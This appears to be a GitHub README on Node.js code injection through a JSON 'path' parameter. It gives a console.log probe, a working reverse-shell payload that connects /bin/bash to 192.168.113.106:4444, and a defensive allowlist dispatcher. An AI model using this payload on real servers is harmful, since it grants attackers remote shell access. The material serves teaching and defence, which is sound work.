enderphan94 / Nodejs-Shell-Injection

#nodejs #reverse_shell

Nodejs-Shell-Injection

Concept:

Vulnerable JSON Parameters

{
  "requests":
  [
    {
      "method":"get","path":"/profile;<injected payload>"
    }
  ]
}

Pre-investigation with Burp Suite

{
  "requests":
  [
    {
      "method":"get","path":"/profile;console.log('INJECTED PAYLOAD');"
    }
  ]
}

Inject Reverse Node.js Shell

{
  "requests":
  [
    {
      "method":"get","path":"/profile;var net = require('net'),sh = require('child_process').exec('\\x2fbin\\x2fbash'); var client = new net.Socket();client.connect(4444, '192.168.113.106', function() {client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"
    }
  ]
}
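
Both payloads above run only if the server treats the "path" string as code. The following is an added example, not code from this repository: a batch dispatcher that validates each entry and looks the route up in a table instead of evaluating it. The route names, handlers, the 20-entry limit and the path pattern are assumptions made for illustration.

```javascript
// Added example: allowlist dispatcher for the batch "requests" body.
// ROUTES and its handlers are hypothetical; "path" is only ever used as a lookup key.
const ROUTES = new Map([
  ["get /profile", () => ({ status: 200, body: "profile" })],
  ["get /settings", () => ({ status: 200, body: "settings" })],
]);

// Strict shape: a leading slash, then URL-safe segment characters only.
// ';', quotes, parentheses and whitespace can never match.
const SAFE_PATH = /^\/[A-Za-z0-9_\-\/]{0,127}$/;

// Returns null when the entry is acceptable, otherwise the rejection reason.
function checkEntry(entry) {
  if (entry === null || typeof entry !== "object") return "entry is not an object";
  const { method, path } = entry;
  if (typeof method !== "string" || typeof path !== "string") {
    return "method and path must be strings";
  }
  if (!SAFE_PATH.test(path)) return "path contains characters outside the allowlist";
  if (!ROUTES.has(`${method.toLowerCase()} ${path}`)) return "unknown route";
  return null;
}

// Validates the whole batch and dispatches each entry through the route table.
function dispatchBatch(body) {
  if (!body || !Array.isArray(body.requests) || body.requests.length > 20) {
    return [{ status: 400, error: "malformed batch" }];
  }
  return body.requests.map((entry) => {
    const reason = checkEntry(entry);
    if (reason) return { status: 400, error: reason };
    return ROUTES.get(`${entry.method.toLowerCase()} ${entry.path}`)();
  });
}

// Constructed sample input: one legitimate entry and the console.log probe shown above.
const sample = JSON.parse(`{"requests":[
  {"method":"get","path":"/profile"},
  {"method":"get","path":"/profile;console.log('INJECTED PAYLOAD');"}
]}`);
console.log(dispatchBatch(sample));
```

Rejected entries are worth logging with the raw "path" value, since a ";" in that field is a reliable signal of the probe shown in the pre-investigation step.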
